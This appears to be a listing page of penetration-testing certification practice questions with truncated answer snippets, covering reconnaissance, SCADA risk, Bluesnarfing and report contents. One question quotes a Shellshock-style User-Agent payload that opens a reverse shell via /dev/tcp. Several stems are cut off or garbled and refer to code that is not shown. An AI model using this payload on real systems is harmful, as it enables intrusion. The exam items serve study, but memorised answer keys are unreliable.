Which of the following would the test discover?

A penetration tester is testing a new API for the company's existing services and is preparing the following script: Which of the following would the test discover?A . Default web configurationsB . Open web ports on a hostC . Supported HTTP methodsD . Listening web servers in a domainView AnswerAnswer:...

December 11, 2023 No Comments READ MORE +

Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:A . devices produce more heat and consume more power.B . devices are obsolete and are no longer available for replacement.C . protocols are more difficult to understand.D . devices may cause physical world effects.View...

December 11, 2023 No Comments READ MORE +

Which of the following tools or techniques would BEST support additional reconnaissance?

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support...

December 10, 2023 No Comments READ MORE +

Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?

During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames. Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?A . Sniff and then crack the WPS PIN...

December 10, 2023 No Comments READ MORE +

Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?A . ShodanB . NmapC . WebScarab-NGD . NessusView AnswerAnswer: A

December 10, 2023 No Comments READ MORE +

Which of the following data structures is systems?

Given the following code: Which of the following data structures is systems?A . A tupleB . A treeC . An arrayD . A dictionaryView AnswerAnswer: C

December 10, 2023 No Comments READ MORE +

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?A . Executive summary of the penetration-testing methods usedB . Bill of materials including supplies, subcontracts, and costs incurred during...

December 10, 2023 No Comments READ MORE +

Which of the following OSs would MOST likely return a packet of this type?

A penetration tester ran a ping CA command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?A . WindowsB . AppleC . LinuxD . AndroidView AnswerAnswer: A Explanation: Reference: https://www.freecodecamp.org/news/how-to-identify-basic-internet-problems-with-ping/

December 10, 2023 No Comments READ MORE +

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”} Which of the following edits should the tester make to the...

December 10, 2023 No Comments READ MORE +

Which of the following BEST describes why this would be necessary?

A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours. Which of the following BEST describes why this would be necessary?A . To meet PCI DSS testing requirementsB . For testing of the customer's SLA with the ISPC...

December 10, 2023 No Comments READ MORE +